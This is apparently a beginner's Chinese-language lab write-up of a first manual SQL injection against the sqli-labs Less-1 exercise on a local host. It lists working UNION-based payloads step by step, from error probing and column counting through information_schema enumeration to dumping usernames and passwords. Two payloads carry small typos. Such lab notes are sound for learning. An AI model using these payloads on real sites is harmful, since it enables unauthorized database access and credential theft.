纪念第一次手动注入

上来先是输入

?id=1寻找注入点,(这道题的注入点就是?id=1)

后面就可以开始注入了

1
http://127.0.0.2:777/Less-1/?id=1'

提示的是

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

有语法错误,这里可能有漏洞

1
http://127.0.0.2:777/Less-1/?id=1'--+

正常回显

1
2
Your Login name:Dumb
Your Password:Dumb

用order by判断这条语句有几列数据

1
?id=1'order by 3--+

在这个地方,输入3的时候正常回显,输入4的时候提示出错,所以判断有3列

于是使用函数查询

1
?id=888(这里随便输入一个数据库不存在的数就行)'union selec ct 1,2,3--+

回显

1
2
Your Login name:2
Your Password:3

如图可见显示位为2,3位

查询数据库名称

1
?id=888’ union select 1,2,database() --+
1
2
Your Login name:2
Your Password:security

继续查看表明

1
?id=888' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'--+
1
2
Your Login name:2
Your Password:emails,referers,uagents,users

显然表中有个users,查看即可得到

1
?id=888' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'--+
1
2
Your Login name:2
Your Password:id,username,password

里面有password和username

1
?id=888' union select 1,group_concat(username),group_concat(password) from security.users--+

7162B3F1A3ECE2BBBA8B6D1FA21423D8.jpg